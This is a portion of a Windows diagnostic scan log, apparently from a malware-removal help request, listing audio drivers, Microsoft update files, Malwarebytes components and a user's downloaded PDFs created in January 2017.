    2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
    2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
    2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
    2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
    2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
    2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
    2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
    2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
    2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
    2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
    2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
    2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
    2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
    2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
    2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
    2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
    2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
    2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
    2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
    2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
    2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
    2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
    2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
    2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
    2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
    2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
    2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
    2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
    2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
    2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
    2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
    2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
    2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
    2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
    2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
    2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
    2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
    2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
    2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
    2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
    2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
    2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
    2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
    2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
    2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
    2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
    2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
    2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
    2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
    2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
    2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
    2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
    2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
    2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
    2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
    2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
    2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
    2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
    2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
    2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
    2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
    2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
    2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
    2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
    2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
    2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
    2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
    2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
    2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
    2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
    2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
    2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
    2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
    2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
    2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
    2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
    2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
    2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
    2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
    2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
    2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
    2017-01-10 17:38 - 2017-02-01 18:26 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
    2017-01-10 17:37 - 2017-02-02 10:10 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
    2017-01-10 17:37 - 2017-02-01 21:20 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
    2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
    2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
    2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
    2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
    2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
    2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
